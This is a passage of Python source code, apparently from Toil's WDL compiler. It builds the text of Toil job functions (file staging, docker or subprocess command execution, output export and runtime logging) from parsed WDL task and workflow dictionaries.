'\\n'\n else:\n main_section = main_section + ' ' + input_var + str(list_iterator) + ' = ' + item + '\\n'\n return main_section\n\n def write_main_jobwrappers(self):\n '''\n Writes out 'jobs' as wrapped toil objects in preparation for calling.\n\n :return: A string representing this.\n '''\n main_section = ''\n\n # toil cannot technically start with multiple jobs, so an empty\n # 'initialize_jobs' function is always called first to get around this\n main_section = main_section + '\\n job0 = Job.wrapJobFn(initialize_jobs)\\n'\n\n # declare each job in main as a wrapped toil function in order of priority\n job_declaration_dict = self.mk_ordered_dict_of_all_job_input_params()\n for job_wrap in job_declaration_dict:\n main_section = main_section + ' ' + job_wrap + ' = Job.wrapJobFn('\n for var in job_declaration_dict[job_wrap]:\n main_section = main_section + var + ', '\n main_section = main_section[:-2]\n main_section = main_section + ')\\n'\n main_section = main_section + '\\n'\n\n return main_section\n\n def write_main_jobcalls(self):\n '''\n Writes out 'job' calls in order of priority.\n\n :return: A string representing this.\n '''\n main_section = ''\n skip_first = 1\n\n for priority in range(self.task_priority + 1):\n for job_declaration in self.workflows_dictionary:\n if isinstance(job_declaration, (list, tuple)):\n if job_declaration[0] == priority:\n main_section = main_section + ' job0.addChild(job' + str(\n job_declaration[1]) + ')\\n'\n if skip_first == 0:\n main_section = main_section + '\\n job0 = job0.encapsulate()\\n'\n skip_first = 0\n if main_section.endswith('\\n job0 = job0.encapsulate()\\n'):\n main_section = main_section[:-34]\n main_section = main_section + ' toil.start(job0)\\n\\n'\n return main_section\n\n def write_main_stats(self):\n '''\n Writes statements giving a runtime to output_directory/wdl-stats.log.\n\n :return: A string containing this.\n '''\n log_dir = os.path.join(self.output_directory, \"wdl-stats.log\")\n main_section_dict = {\"log_dir\": log_dir}\n main_section = heredoc_wdl('''\n end = time.time()\n with open(\"{log_dir}\", \"a+\") as f:\n f.write(\"Ending WDL Job @ \" + str(time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())))\n f.write(\"\\\\n\")\n f.write(\"Total runtime: %2.2f sec\" % (end - start))\n f.write(\"\\\\n\\\\n\")\n f.write(\"\\\\n\" + \"-\"*80 + \"\\\\n\")''', main_section_dict,\n indent=' ')\n return main_section\n\n def write_functions(self):\n '''\n Writes out a python function for each WDL \"task\" object.\n\n :return: a giant string containing the meat of the job defs.\n '''\n\n # toil cannot technically start with multiple jobs, so an empty\n # 'initialize_jobs' function is always called first to get around this\n fn_section = \"def initialize_jobs(job):\\n\" + \\\n \" job.fileStore.logToMaster('''initialize_jobs''')\\n\\n\"\n\n list_of_jobs_to_write = self.return_one_job_per_priority()\n\n for job in list_of_jobs_to_write:\n needs_docker = self.determine_if_docker_job(job)\n if needs_docker:\n function_to_write = self.write_docker_function(job)\n else:\n function_to_write = self.write_nondocker_function(job)\n\n fn_section = fn_section + function_to_write\n\n return fn_section\n\n def write_nondocker_function(self, job):\n '''\n Writes out a python function for each WDL \"task\" object.\n\n Each python function is a unit of work written out as a string in\n preparation to being written out to a file. In WDL, each \"job\" is\n called a \"task\". Each WDL task is written out in multiple steps:\n\n 1: Header and inputs (e.g. 'def mapping(self, input1, input2)')\n 2: Log job name (e.g. 'job.fileStore.logToMaster('initialize_jobs')')\n 3: Create temp dir (e.g. 'tempDir = job.fileStore.getLocalTempDir()')\n 4: import filenames and use readGlobalFile() to get files from the\n jobStore\n 5: Reformat commandline variables (like converting to ' '.join(files)).\n 6: Commandline call using subprocess.Popen().\n 7: Write the section returning the outputs. Also logs stats.\n\n :return: a giant string containing the meat of the job defs for the toil script.\n '''\n\n fn_section = ''\n\n job_priority = job[0]\n job_number = job[1]\n job_task_reference = job[2] # default name\n job_alias = job[\n 3] # reassigned name (optional; default if not assigned)\n\n # get all variable declarations for this particular job\n job_declaration_array = self.get_job_declarations(job)\n\n # write the function header\n function_header = self.write_function_header(job, job_declaration_array)\n fn_section = fn_section + function_header\n\n # log to toil which job is being run when this function is called\n fn_start_dict = {\"job_alias\": job_alias}\n fn_start = heredoc_wdl('''\n job.fileStore.logToMaster(\"{job_alias}\")\n start = time.time()\n\n tempDir = job.fileStore.getLocalTempDir()\n\n ''', fn_start_dict, indent=' ')\n fn_section = fn_section + fn_start\n\n # import files into the job store using readGlobalFile()\n readglobalfiles_declarations = self.write_function_readglobalfiles(job,\n job_declaration_array)\n fn_section = fn_section + readglobalfiles_declarations\n\n # write out commandline keywords\n cmdline = self.write_function_cmdvarprep(job, docker=False)\n fn_section = fn_section + cmdline\n\n # write out commandline keywords\n cmdline = self.write_function_cmdline(job, docker=False)\n fn_section = fn_section + cmdline\n\n subprocesspopen = self.write_function_subprocesspopen(job)\n fn_section = fn_section + subprocesspopen\n\n # write the outputs for the definition to return\n return_outputs = self.write_function_outputreturn(job,\n job_task_reference)\n fn_section = fn_section + return_outputs\n\n return fn_section\n\n def write_docker_function(self, job):\n '''\n Writes out a python function for each WDL \"task\" object.\n\n Each python function is a unit of work written out as a string in\n preparation to being written out to a file. In WDL, each \"job\" is\n called a \"task\". Each WDL task is written out in multiple steps:\n\n 1: Header and inputs (e.g. 'def mapping(self, input1, input2)')\n 2: Log job name (e.g. 'job.fileStore.logToMaster('initialize_jobs')')\n 3: Create temp dir (e.g. 'tempDir = job.fileStore.getLocalTempDir()')\n 4: Make a new folder for the execution to take place in\n 5: import filenames and use readGlobalFile() to get files from the\n jobStore\n 6: Write the line to create a bashscript file.\n 6: Reformat commandline variables (like converting to '/data/' + file).\n 7: apiDockerCall() to run docker.\n 8: Write the section returning the outputs. Also logs stats.\n\n :return: a giant string containing the meat of the job defs for the toil script.\n '''\n\n fn_section = ''\n\n job_priority = job[0]\n job_number = job[1]\n job_task_reference = job[2] # default name\n job_alias = job[\n 3] # reassigned name (optional; default if not assigned)\n\n # get all variable declarations for this particular job\n job_declaration_array = self.get_job_declarations(job)\n\n # write the function header\n function_header = self.write_function_header(job, job_declaration_array)\n fn_section = fn_section + function_header\n\n # log to toil which job is being run when this function is called\n fn_start_dict = {\"job_alias\": job_alias}\n fn_start = heredoc_wdl('''\n job.fileStore.logToMaster(\"{job_alias}\")\n start = time.time()\n\n tempDir = job.fileStore.getLocalTempDir()\n\n try:\n os.makedirs(tempDir + '/execution')\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise''', fn_start_dict, indent=' ')\n fn_section = fn_section + fn_start\n\n # import files into the job store using readGlobalFile()\n readglobalfiles_declarations = self.write_function_readglobalfiles(job,\n job_declaration_array)\n fn_section = fn_section + readglobalfiles_declarations\n\n # prep Array[File] commandline keywords\n cmdline = self.write_function_cmdvarprep(job, docker=True)\n fn_section = fn_section + cmdline\n\n # write out commandline keywords\n cmdline = self.write_function_cmdline(job, docker=True)\n fn_section = fn_section + cmdline\n\n bashscriptline = self.write_function_bashscriptline(job_task_reference,\n job_alias)\n fn_section = fn_section + bashscriptline\n\n docker_image = self.get_docker_image(job_task_reference)\n\n dockercall = self.write_function_dockercall(job_task_reference,\n docker_image)\n fn_section = fn_section + dockercall\n\n # write the outputs for the definition to return\n return_outputs = self.write_function_outputreturn(job,\n job_task_reference)\n fn_section = fn_section + return_outputs\n\n return fn_section\n\n def write_function_header(self, job, job_declaration_array):\n '''\n Writes the header that starts each function, for example, this function\n can write and return:\n\n 'def write_function_header(self, job, job_declaration_array):'\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param job_declaration_array: A list of all inputs that job requires.\n :return: A string representing this.\n '''\n job_alias = job[3]\n\n fn_section = ''\n\n fn_section = fn_section + '\\n\\ndef ' + job_alias + '(job, '\n for job_declaration in job_declaration_array:\n job_declaration_name = job_declaration[0]\n fn_section = fn_section + job_declaration_name + ', '\n fn_section = fn_section[:-2]\n fn_section = fn_section + '):\\n'\n\n return fn_section\n\n def write_function_readglobalfiles(self, job, job_declaration_array):\n '''\n Writes all job.fileStore.readGlobalFile() declarations needed to get\n files from the job store.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param job_declaration_array: A list of all inputs that job requires.\n :return: A string representing this.\n '''\n fn_section = ''\n for job_declaration in job_declaration_array:\n job_declaration_name = job_declaration[0]\n job_declaration_type = job_declaration[1]\n job_declaration_key = None\n if job_declaration_type == 'File':\n job_declaration_key, parent_job = self.if_output_mk_a_key(job,\n job_declaration_name)\n jobdecl_dict = {\"job_declaration_name\": job_declaration_name,\n \"job_declaration_key\": job_declaration_key}\n if job_declaration_key:\n jobdecl = heredoc_wdl('''\n try:\n {job_declaration_name}_fs = job.fileStore.readGlobalFile({job_declaration_name}[\"{job_declaration_key}\"][0], userPath=os.path.join(tempDir, {job_declaration_name}[\"{job_declaration_key}\"][1]))\n except:\n {job_declaration_name}_fs = os.path.join(tempDir, {job_declaration_name}[\"{job_declaration_key}\"][1])\n\n ''', jobdecl_dict, indent=' ')\n else:\n jobdecl = heredoc_wdl('''\n try:\n {job_declaration_name}_fs = job.fileStore.readGlobalFile({job_declaration_name}[0], userPath=os.path.join(tempDir, {job_declaration_name}[1]))\n except:\n {job_declaration_name}_fs = os.path.join(tempDir, {job_declaration_name}[1])\n\n ''', jobdecl_dict, indent=' ')\n fn_section = fn_section + jobdecl\n if job_declaration_type == 'ArrayFile':\n # these are handled in write_function_cmdvarprep()\n pass\n\n return fn_section\n\n def write_function_bashscriptline(self, job_task_reference, job_alias):\n '''\n Writes a function to create a bashscript for injection into the docker\n container.\n\n :param job_task_reference: The job referenced in WDL's Task section.\n :param job_alias: The actual job name to be written.\n :return: A string writing all of this.\n '''\n fn_section = \" generate_docker_bashscript_file(temp_dir=tempDir, docker_dir='/data', globs=[\"\n if self.tasks_dictionary[job_task_reference]['outputs']:\n for output in self.tasks_dictionary[job_task_reference]['outputs']:\n if output[1] == 'ArrayFile' or 'File':\n output_filename = output[2][0]\n fn_section = fn_section + \"'\" + output_filename + \"', \"\n else:\n raise NotImplementedError\n if fn_section.endswith(', '):\n fn_section = fn_section[:-2]\n fn_section = fn_section + \"], cmd=cmd, job_name='\" + str(\n job_alias) + \"')\\n\"\n fn_section = fn_section + '\\n'\n\n return fn_section\n\n def write_function_dockercall(self, job_task_reference, docker_image):\n '''\n Writes a string containing the apiDockerCall() that will run the job.\n\n :param job_task_reference: The name of the job calling docker.\n :param docker_image: The corresponding name of the docker image.\n e.g. \"ubuntu:latest\"\n :return: A string containing the apiDockerCall() that will run the job.\n '''\n docker_dict = {\"docker_image\": docker_image,\n \"job_task_reference\": job_task_reference\n }\n docker_template = heredoc_wdl('''\n apiDockerCall(job, \n image=\"{docker_image}\", \n working_dir=tempDir, \n parameters=[\"/data/{job_task_reference}_script.sh\"], \n entrypoint=\"/bin/bash\", \n volumes={{tempDir: {{\"bind\": \"/data\"}}}})\n\n ''', docker_dict, indent=' ')\n\n return docker_template\n\n def write_function_cmdvarprep(self, job, docker=False):\n '''\n Finds ArrayFiles that need to be reformatted, as per sep=' '.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :return: A string containing this.\n '''\n\n fn_section = ''\n job_task_reference = job[2]\n for cmd_name, cmd_type, cmd_actions_dict in \\\n self.tasks_dictionary[job_task_reference]['raw_commandline']:\n for input in self.tasks_dictionary[job_task_reference]['inputs']:\n input_var_name = input[0]\n input_var_type = input[1]\n if cmd_name == input_var_name:\n if input_var_type == 'ArrayFile':\n job_declaration_key, parent_job = self.if_output_mk_a_key(\n job, input_var_name)\n if job_declaration_key:\n called_multiple_times = self.determine_if_called_multitimes(\n parent_job)\n else:\n called_multiple_times = False\n if 'sep' in cmd_actions_dict:\n fn_section = fn_section + \\\n self.write_function_cmdvarprep_arrayfile(\n sep=True,\n sep_var=cmd_actions_dict['sep'],\n docker=docker,\n job_declaration_key=job_declaration_key,\n cmd_name=cmd_name,\n called_multiple_times=called_multiple_times)\n else:\n fn_section = fn_section + \\\n self.write_function_cmdvarprep_arrayfile(\n sep=False,\n sep_var=None,\n docker=docker,\n job_declaration_key=job_declaration_key,\n cmd_name=cmd_name,\n called_multiple_times=called_multiple_times)\n return fn_section\n\n def write_function_cmdvarprep_arrayfile(self,\n sep,\n sep_var,\n docker,\n job_declaration_key,\n cmd_name,\n called_multiple_times):\n '''\n For all Array[File] inputs, there are a couple of recipes to import each\n of the files inside into the toil jobStore properly, and this function\n handles writing those.\n\n :param sep: Whether an array should be concatenated into a large string\n with some separator. Equivalent to ' '.join(filearray).\n :param sep_var: The string separator used to join the array of strings.\n i.e. ' -V ' for something like ' -V '.join(filearray)\n :param docker: If this is a docker function, in which case the filepaths\n need to begin with the default of '/data'.\n :param job_declaration_key:\n :param cmd_name:\n :return: A string writing all of this.\n '''\n fn_section = ''\n\n if job_declaration_key:\n formatted_key = '[\"' + job_declaration_key + '\"]'\n else:\n formatted_key = ''\n\n if called_multiple_times:\n formatted_key = ''\n multicall_key = '[\"' + job_declaration_key + '\"]'\n else:\n multicall_key = ''\n\n if docker:\n path_appended = '\"/data/\" + i[1]'\n else:\n path_appended = 'j'\n\n if sep:\n fn_section = fn_section + ' ' + cmd_name + '_list = []\\n'\n fn_section = fn_section + ' for i in ' + cmd_name + formatted_key + ':\\n'\n fn_section = fn_section + ' try:\\n'\n fn_section = fn_section + ' j = job.fileStore.readGlobalFile(i' + multicall_key + '[0], userPath=os.path.join(tempDir, i' + multicall_key + '[1]))\\n'\n if sep:\n fn_section = fn_section + ' ' + cmd_name + '_list.append(' + path_appended + ')\\n'\n fn_section = fn_section + ' except:\\n'\n fn_section = fn_section + ' j = os.path.join(tempDir, i' + multicall_key + '[1])\\n'\n if sep:\n fn_section = fn_section + ' ' + cmd_name + '_list.append(' + path_appended + ')\\n'\n fn_section = fn_section + ' ' + cmd_name + '_sep = \"' + str(\n sep_var) + '\".join(' + cmd_name + '_list)\\n\\n'\n return fn_section\n\n def write_function_cmdline(self, job, docker):\n '''\n Write a series of commandline variables to be concatenated together\n eventually and either called with subprocess.Popen() or with\n apiDockerCall() if a docker image is called for.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :return: A string representing this.\n '''\n\n fn_section = ''\n command_var_decl_array = []\n job_task_reference = job[2]\n for cmd in self.tasks_dictionary[job_task_reference]['raw_commandline']:\n cmd_name = cmd[0]\n cmd_type = cmd[1]\n cmd_actions_dict = cmd[2]\n command_var_decl = 'command' + str(self.command_number)\n if cmd_type == 'variable':\n job_declaration_key, parent_job = self.if_output_mk_a_key(job,\n cmd_name)\n if job_declaration_key:\n output_dict_key = '[\"' + job_declaration_key + '\"]'\n else:\n output_dict_key = ''\n for input in self.tasks_dictionary[job_task_reference][\n 'inputs']:\n input_var_name = input[0]\n input_var_type = input[1]\n if cmd_name == input_var_name:\n\n if input_var_type == 'File':\n if docker:\n fn_section = fn_section + ' ' + command_var_decl + ' = \"/data/\" + ' + cmd_name + output_dict_key + '[1]\\n'\n else:\n fn_section = fn_section + ' ' + command_var_decl + ' = ' + cmd_name + '_fs\\n'\n\n elif input_var_type == 'ArrayFile':\n if 'sep' in cmd_actions_dict:\n fn_section = fn_section + ' ' + command_var_decl + ' = ' + cmd_name + '_sep\\n'\n else:\n fn_section = fn_section + ' ' + command_var_decl + ' = ' + cmd_name + '\\n'\n else:\n fn_section = fn_section + ' ' + command_var_decl + ' = ' + cmd_name + '\\n'\n\n if cmd_type == 'normal_string':\n fn_section = fn_section + ' ' + command_var_decl + \" = '''\" + cmd_name + \"'''\\n\"\n self.command_number = self.command_number + 1\n command_var_decl_array.append(command_var_decl)\n\n fn_section = fn_section + '\\n cmd = '\n for command in command_var_decl_array:\n fn_section = fn_section + command + ' + '\n if fn_section.endswith(' + '):\n fn_section = fn_section[:-3]\n fn_section = fn_section + '\\n\\n'\n\n return fn_section\n\n def write_function_subprocesspopen(self, job):\n '''\n Write a subprocess.Popen() call for this function and write it out as a\n string.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :return: A string representing this.\n '''\n fn_section = heredoc_wdl('''\n this_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n this_process.communicate()\n ''', indent=' ')\n\n return fn_section\n\n def write_function_outputreturn(self, job, job_task_reference):\n '''\n Find the output values that this function needs and write them out as a\n string.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param job_task_reference: The name of the job to look up values for.\n :return: A string representing this.\n '''\n\n fn_section = ''\n if 'outputs' in self.tasks_dictionary[job_task_reference]:\n files_to_return = []\n glob = False\n for output in self.tasks_dictionary[job_task_reference]['outputs']:\n output_name = output[0]\n output_type = output[1]\n output_value = output[2]\n output_action_dict = output[3]\n\n if output_value != '':\n if 'index_lookup' in output_action_dict:\n suffix = '_il'\n else:\n suffix = ''\n\n if 'glob' in output_action_dict:\n\n glob_dict = {\n \"output_name\": output_name,\n \"suffix\": suffix,\n \"out_value\": output_value[0],\n \"out_dir\": self.output_directory}\n glob_template = heredoc_wdl('''\n {output_name}{suffix} = []\n for x in recursive_glob(job, directoryname=tempDir, glob_pattern=\"{out_value}\"):\n output_file = job.fileStore.writeGlobalFile(x)\n output_filename = os.path.basename(x)\n job.fileStore.exportFile(output_file, \"file://{out_dir}/\" + output_filename)\n {output_name}{suffix}.append((output_file, output_filename))\n\n ''', glob_dict, indent=' ')\n fn_section = fn_section + glob_template\n\n if 'index_lookup' in output_action_dict:\n index_dict = {\n \"output_name\": output_name,\n \"suffix\": suffix,\n \"index_num\": str(\n output_action_dict['index_lookup'])}\n index_template = heredoc_wdl('''\n {output_name} = {output_name}{suffix}[{index_num}]\n ''', index_dict, indent=' ')\n fn_section = fn_section + index_template.format(\n **index_dict)\n\n else:\n fn_section = fn_section + '\\n'\n files_to_return.append(output_name)\n else:\n nonglob_dict = {\n \"formatted_output_filename\": self.translate_wdl_string_to_python_string(\n job, output_value),\n \"output_name\": output_name,\n \"out_dir\": self.output_directory}\n nonglob_template = heredoc_wdl('''\n output_filename = {formatted_output_filename}\n output_file = job.fileStore.writeGlobalFile(output_filename)\n job.fileStore.exportFile(output_file, \"file://{out_dir}/\" + output_filename)\n {output_name} = (output_file, output_filename)\n\n ''', nonglob_dict, indent=' ')\n fn_section = fn_section + nonglob_template\n files_to_return.append(output_name)\n\n if files_to_return:\n fn_section = fn_section + ' rvDict = {'\n for file in files_to_return:\n fn_section = fn_section + '\"' + file + '\": ' + file + ', '\n if fn_section.endswith(', '):\n fn_section = fn_section[:-2]\n if files_to_return:\n fn_section = fn_section + '}\\n\\n'\n\n # only for logging stats\n log_dir = os.path.join(self.output_directory, \"wdl-stats.log\")\n stats_dict = {\"log_dir\": log_dir,\n \"job_name\": job[3]}\n stats_template = heredoc_wdl('''\n end = time.time()\n with open(\"{log_dir}\", \"a+\") as f:\n f.write(str(\"{job_name}\") + \" now being run.\")\n f.write(\"\\\\n\\\\n\")\n f.write(\"Outputs:\\\\n\")\n for rv in rvDict:\n f.write(str(rv) + \": \" + str(rvDict[rv]))\n f.write(\"\\\\n\")\n f.write(\"Total runtime: %2.2f sec\" % (end - start))\n f.write(\"\\\\n\\\\n\")\n ''', stats_dict, indent=' ')\n fn_section = fn_section + stats_template\n\n if files_to_return:\n fn_section = fn_section + ' return rvDict\\n\\n'\n\n return fn_section\n\n def if_output_mk_a_key(self, job, job_declaration_name):\n '''\n An input variable for a job may be called \"GVCFs\", but the output that\n generates it may have called it \"gvcf\" and this function fetches that\n output's old name.\n\n This is important because all outputs are packaged as a dictionary of\n outputs, where individual values are extracted using the original output\n name as a key.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param input_var_name: The name of the input to look up values for.\n :return dict_output_key, parent_job: The output key if it is different\n from the original name, otherwise it returns the same name.\n '''\n if job in self.workflows_dictionary:\n for input in self.workflows_dictionary[job]['job_declarations']:\n input_type = \\\n self.workflows_dictionary[job]['job_declarations'][input][\n 'type']\n if input_type == 'output':\n input_name = \\\n self.workflows_dictionary[job]['job_declarations'][input][\n 'name']\n if input == job_declaration_name:\n parent_job = input_name.split()[0]\n dict_output_key = input_name.split()[-1]\n return dict_output_key, parent_job\n return None, None\n\n def get_docker_image(self, job_task_reference):\n '''\n Find the corresponding docker image for writing this job's dockerCall in\n the self.tasks_dictionary's runtime.\n\n :param job_task_reference: Name of the job; used as a key to call the\n task's dictionary.\n :return: The corresponding name of the docker image, e.g. \"ubuntu:latest\"\n '''\n if self.tasks_dictionary[job_task_reference]['runtime']:\n for tuple in self.tasks_dictionary[job_task_reference]['runtime']:\n if tuple[0] == 'docker':\n docker_image = tuple[1]\n else:\n raise RuntimeError(\n 'Writing docker function, but no runtime section found.')\n return docker_image\n\n def translate_wdl_string_to_python_string(self, job, some_string):\n '''\n Parses a string representing a given job's output filename into something\n python can read. Replaces ${string}'s with normal variables and the rest\n with normal strings all concatenated with ' + '.\n\n Will not work with additional parameters, such as:\n ${default=\"foo\" bar}\n or\n ${true=\"foo\" false=\"bar\" Boolean baz}\n\n This method expects to be passed only strings with some combination of\n \"${abc}\" and \"abc\" blocks.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param some_string: e.g. '${sampleName}.vcf'\n :return: output_string, e.g. 'sampleName + \".vcf\"'\n '''\n\n # add support for 'sep'\n output_string = ''\n edited_string = some_string.strip()\n\n if edited_string.find('${') != -1:\n continue_loop = True\n while (continue_loop):\n index_start = edited_string.find('${')\n index_end = edited_string.find('}', index_start)\n\n stringword = edited_string[:index_start]\n\n if index_start != 0:\n output_string = output_string + \"'\" + stringword + \"' + \"\n\n keyword = edited_string[index_start + 2:index_end]\n output_string = output_string + keyword + \" + \"\n\n edited_string = edited_string[index_end + 1:]\n if edited_string.find('${') == -1:\n continue_loop = False\n if edited_string:\n output_string = output_string + \"'\" + edited_string + \"' + \"\n else:\n output_string = \"'\" + edited_string + \"'\"\n\n if output_string.endswith(' + '):\n output_string = output_string[:-3]\n\n return output_string\n\n def return_one_job_per_priority(self):\n '''\n Definitions only need to be declared once, even if they are run multiple\n times, this function returns a list of jobs with these redundant jobs\n removed for this purpose.\n\n :return: job_list_with_redundant_jobs_removed\n '''\n job_list_with_redundant_jobs_removed = []\n for i in range(len(self.workflows_dictionary)):\n for job in self.workflows_dictionary:\n if i == job[0]:\n job_list_with_redundant_jobs_removed.append(job)\n break\n return (job_list_with_redundant_jobs_removed)\n\n def determine_if_docker_job(self, job):\n '''\n Returns True if the job has a docker parameter specified in its Task's\n 'runtime' section.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :return:\n '''\n docker = False\n job_task_reference = job[2] # default name\n if 'runtime' in self.tasks_dictionary[job_task_reference]:\n for runtime_var in self.tasks_dictionary[job_task_reference][\n 'runtime']:\n if runtime_var[0] == 'docker':\n docker = True\n return docker\n\n def mk_ordered_dict_of_all_job_input_params(self):\n '''\n Gets all of the info necessary to write the the toil job wrapping\n declarations with all appropriate variables.\n\n :return: an ordered dictionary. Example:\n\n OrderedDict(\n [('job1', ['mapping', 'files=fastqs', 'reference_file=reference']),\n ('job2', ['process', 'i=fastqs', 'r=reference', 'sai=job1.rv()'])])\n '''\n job_dict = {}\n\n sort_these_jobs = []\n for job_map in self.workflows_dictionary:\n if isinstance(job_map, (list, tuple)):\n sort_these_jobs.append(job_map)\n sorted_jobs = sorted(sort_these_jobs)\n\n i = 1\n for job in sorted_jobs:\n job_reference = job[2]\n job_alias = job[3]\n job_name = 'job' + str(i)\n declaration_array = [job_alias]\n for task_declaration in self.tasks_dictionary[job_reference][\n 'inputs']:\n task_var_name = task_declaration[0]\n mapped_var = self.map_to_final_var(job, task_var_name)\n declaration_array.append(task_var_name + '=' + mapped_var)\n job_dict[job_name] = declaration_array\n i = i + 1\n ordered_job_dict = collections.OrderedDict(sorted(job_dict.items(),\n key=lambda t: t[0]))\n return ordered_job_dict\n\n def map_to_final_var(self, job, task_var_name):\n '''\n Typically takes a task variable, and if it is assigned to a new variable\n in the workflow, it it will return the new workflow replacement,\n otherwise it just returns the same variable back.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :param task_var_name: The variable name that needs to be mapped.\n :return mapped_var: The input needed for this job for the original\n declared variable.\n '''\n mapped_var = ' '\n for wf_declaration in self.workflows_dictionary[job][\n 'job_declarations']:\n if task_var_name == wf_declaration:\n wf_declaration_type = \\\n self.workflows_dictionary[job]['job_declarations'][\n wf_declaration]['type']\n wf_declaration_name = \\\n self.workflows_dictionary[job]['job_declarations'][\n wf_declaration]['name']\n mapped_var = self.map_to_final_var_type(wf_declaration_name,\n wf_declaration_type)\n if mapped_var == ' ':\n return task_var_name\n else:\n return mapped_var\n\n def map_to_final_var_type(self, declaration_name, declaration_type):\n '''\n Identifies workflow variable type, and if anything other than another\n variable name, modifies the file based on its type accordingly.\n\n :param declaration_name: A variable name, like x.\n :param declaration_type: Example types are:\n\n 'identifier':\n wv --> wv\n 'index_value':\n wv --> wv[0][1]\n 'string':\n wv --> 'wv'\n 'output':\n wv --> job1.rv()\n OR\n wv --> [job1.rv(), job2.rv(), job3.rv()]\n\n :return declaration_name: Modified by type as appropriate above.\n '''\n if declaration_type == 'identifier':\n return declaration_name\n elif declaration_type == 'index_value':\n potential_scatter_item = declaration_name.split('[')[0]\n for collection in self.workflows_dictionary['scatter_calls']:\n scatter_item = self.workflows_dictionary['scatter_calls'][\n collection]\n if scatter_item == potential_scatter_item:\n old_index = declaration_name[len(potential_scatter_item):]\n return collection + old_index\n elif declaration_type == 'string':\n return \"'\" + declaration_name + \"'\"\n elif declaration_type == 'output':\n return_values = []\n job_alias_reference = declaration_name.split()[0]\n for wf in self.workflows_dictionary:\n if isinstance(wf, (list, tuple)):\n wf_alias_reference = wf[3]\n wf_job_num = wf[1]\n if job_alias_reference == wf_alias_reference:\n return_values.append('job' + str(wf_job_num) + '.rv()')\n if len(return_values) == 1:\n declaration_name = return_values[0]\n if len(return_values) > 1:\n declaration_name = '[' + ', '.join(return_values) + ']'\n else:\n raise NotImplementedError\n return declaration_name\n\n def determine_if_called_multitimes(self, parent_job):\n '''\n Returns True if the parent_job (alias) is called more than once during\n the run.\n\n This is helpful and used to determine the following:\n\n If a job is called once, it returns a single dictionary of outputs to be\n input into the next job:\n JobInputs(FnName, A=A, B=B, C=C, D=Job1.rv())\n Where an example of Job1.rv() is:\n Job1.rv() = {'value1': 1, 'value2': 2}\n\n If a job is called more than once though, it returns an array of\n dictionaries:\n JobInputs(FnName, A=A, B=B, C=C, D=[Job1.rv(), Job2.rv()])\n Where examples of Job1.rv() & Job2.rv() are:\n Job1.rv() = {'value1': 1, 'value2': 2}\n Job2.rv() = {'value3': 3, 'value4': 4}\n\n This basically determines if the input file is expected to be an array\n or a dictionary and write the appropriate function calls.\n\n :param parent_job: e.g. a function def name like \"haplotypeCaller\"\n :return: bool True if called multiple times; False if not.\n '''\n jobs_that_called_this_task = []\n for task in self.workflows_dictionary:\n if isinstance(task, (list, tuple)):\n if parent_job == task[3]:\n jobs_that_called_this_task.append(task)\n\n if len(jobs_that_called_this_task) > 1:\n multiple_calls = True\n else:\n multiple_calls = False\n\n return multiple_calls\n\n def get_job_declarations(self, job):\n '''\n Get the default declaration variable list from the WDL \"task\" skeleton.\n\n :param job: A list such that:\n (job priority #, job ID #, Job Skeleton Name, Job Alias)\n :return: declarations_list of variables from the Task 'input' section.\n '''\n job_task_reference = job[2]\n declarations_list = []\n inputs = self.tasks_dictionary[job_task_reference]['inputs']\n for task_input in inputs:\n declarations_list.append((task_input[0], task_input[1]))\n return declarations_list\n\n def write_python_file(self,\n module_section,\n fn_section,\n main_section,\n output_file):\n '''\n Just takes three strings and writes them to output_file.\n\n :param module_section: A string of 'import modules'.\n :param fn_section: A string of python 'def functions()'.\n :param main_section: A string declaring toil options and main's header.\n :param job_section: A string import files into toil and declaring jobs.\n :param output_file: The file to write the compiled toil script to.\n '''\n with open(output_file, 'w') as file:\n file.write(module_section)\n file.write(fn_section)\n file.write(main_section)\n\n def write_AST(self):\n '''\n Prints an AST to stdout.\n\n Does not work by default with toil since Toil actively suppresses stdout\n during the run.\n '''\n with open('AST.out', 'w') as f:\n with open(self.wdl_file, 'r') as wdl:\n wdl_string = wdl.read()\n ast = wdl_parser.parse(wdl_string).ast()\n f.write(ast.dumps(indent=2))\n\n def write_mappings(self, i):\n '''\n Intended to take a ToilWDL_instance (i) and prints the final task dict,\n workflow dict, csv dict, and tsv dict.\n\n Does not work by default with toil since Toil actively suppresses stdout\n during the run.\n\n :param i: A class object instance with the following dict variables:\n self.tasks_dictionary\n self.workflows_dictionary\n self.tsv_dict\n self.csv_dict\n '''\n with open('mappings.out', 'w') as f:\n f.write('\\n\\ntask_dict')\n f.write(str(i.tasks_dictionary))\n for each_task in i.tasks_dictionary:\n f.write(str(each_task))\n if i.tasks_dictionary[each_task]:\n for each_section in i.tasks_dictionary[each_task]:\n f.write(' ' + str(each_section))\n if i.tasks_dictionary[each_task][each_section]:\n for each_variable in i.tasks_dictionary[each_task][\n each_section]:\n f.write(' ' + str(each_variable))\n\n f.write('\\n\\nworkflows_dict')\n f.write(str(i.workflows_dictionary))\n for each_task in i.workflows_dictionary:\n f.write(str(each_task))\n if 'wf_declarations' in i.workflows_dictionary[each_task]:\n f.write(' wf_declarations')\n for d in i.workflows_dictionary[each_task][\n 'wf_declarations']:\n f.write(' ' + str(d))\n if 'job_declarations' in i.workflows_dictionary[each_task]:\n f.write(' job_declarations')\n for j in i.workflows_dictionary[each_task][\n 'job_declarations']:\n f.write(' ' + str(j))\n for g in \\\n i.workflows_dictionary[each_task]['job_declarations'][\n j]:\n f.write(' ' + g + ': ' +\n i.workflows_dictionary[each_task][\n 'job_declarations'][j][g])\n\n f.write('\\n\\ntsv_dict')\n for var in 